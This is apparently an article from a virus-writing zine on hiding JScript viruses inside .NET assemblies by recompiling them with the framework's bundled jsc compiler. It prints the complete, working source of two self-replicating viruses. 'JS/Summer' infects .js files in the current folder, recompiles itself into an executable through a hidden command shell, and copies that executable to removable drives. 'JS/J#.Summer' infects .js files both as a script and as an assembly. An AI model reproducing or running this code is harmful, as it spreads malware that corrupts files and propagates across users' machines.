Hidden in .NET
by
hh86
.NET Compilers
Microsoft decided to include compilers along with the .NET framework that is
available pretty much in every computer of the world running Windows. Compilers
include one for JScript .NET. So, we can compile our JScript virus source into
.NET assembly. Imagine you have polymorphic JScript virus, it is transformed to
MSIL code, what is the result? One great .NET assembly that looks very different
than previous one, so in each computer you can generate multiple polymorphic or
even more complex instances of the virus running and spreading as exe file.
This is much more powerful technique than using JS2EXE tools. ;) Since now you
can infect files and recompile yourself!
How hidden?
Source code will be encoded as UTF-16LE string (no BOM present because every
string is stored in this format). They are stored in the MetaData section.
When running, it will use the VSA Engine to run our script. This looks like an
easy way to host and run the script, however, this gets as complex as the source
code is. One of the problems for me was to make a JScript file infector, how
was I going to retrieve my source code? After some examination I found this, and
I knew reflections must be available. JScript always had its reflection system
(in part, because of the Function() object, we can create a function to be in a
variable), so we don't need to open our own file and get the code, really.
How we do it
We just need access to .NET Framework directory "Microsoft .NET\Framework". The
detail here is there will be multiple versions of the framework. I choose to go
using the last one, 4.0.
Here is my virus JS/Summer, *must* be single-line, run carefully: it spreads to
fixed drives if possible.
g();function g(){;f=new ActiveXObject("Scripting.FileSystemObject");n=f.GetSpecialFolder(0)+"\\Microsoft.NET\\Framework\\v4.0.30319\\";c="g();"+g;v="v=[]";for(i=0;i<c.length;i++){v=v+";v.push(\"\\x"+c.substr(i,1).charCodeAt(0).toString(16)+"\")"}v=v+c.substr(17,51)+"s=f.CreateTextFile(\"v.js\",2);v=v.join(\"\");s.Write(v);s.Close()";for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext()){x=y.item();if(f.GetExtensionName(x).toLowerCase()=="js"){try{b=f.OpenTextFile(x);k=b.Read(4);if(k!=c.substr(0,4)){h=b.ReadAll();b.Close();p=x.Attributes;x.Attributes=0;l=f.CreateTextFile(x);l.Write(c+";"+k+h);l.Close();x.Attributes=p}}catch(e){}}}s=f.CreateTextFile(n+"v",2);s.Write(v);s.Close();w=new ActiveXObject("WScript.Shell").Run("cmd /k cd "+n+"&jsc /t:winexe /fast- v&exit",0,1);for(y=new Enumerator(f.Drives);!y.atEnd();y.moveNext()){u=y.item();if(u.DriveType==1){v="v.exe";f.CopyFile(n+v,u+"\\"+v)}}}
JS .NET virus
I thought to make an interesting cross-infector. However, we cannot know when
file is certainly JScript or JScript .NET. Known bug is we cannot include the
"import System;import System.IO" we require for JScript .NET. :(
Here is though, JS/J#.Summer:
g();function g()
{
/*access source code in #US when in .NET assembly*/
var u="g();"+g+"\r\n";
try
{
s=GC //but it was a trick and the clock struck 12
}
catch(e)
{
var f=new ActiveXObject("Scripting.FileSystemObject");
for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
{
var x=y.item();
if(f.GetExtensionName(x).toLowerCase()=="js")
{
try
{
var b=f.OpenTextFile(x);var h=b.ReadAll();b.Close();
if(h.substr(0,4)!="g();")
{
var p=x.Attributes;x.Attributes=0;var l=f.CreateTextFile(x);l.Write(u+h);l.Close();x.Attributes=p
}
}
catch(e)
{}
}
}
return
}
/*MSIL code now*/
var w,s=Object();
var y=Directory.GetFiles(Directory.GetCurrentDirectory(),"*.js");
for(var x in y)
{
x=y[x].ToString();
try
{
s=new StreamReader(x);var c=s.ReadToEnd();s.Close();
if(c.substr(0,4)!="g();")
{
var a=File.GetAttributes(x);File.SetAttributes(x,0);w=new StreamWriter(x);w.Write(u+c);w.Close();File.SetAttributes(x,a)
}
}
catch(e)
{}
}
}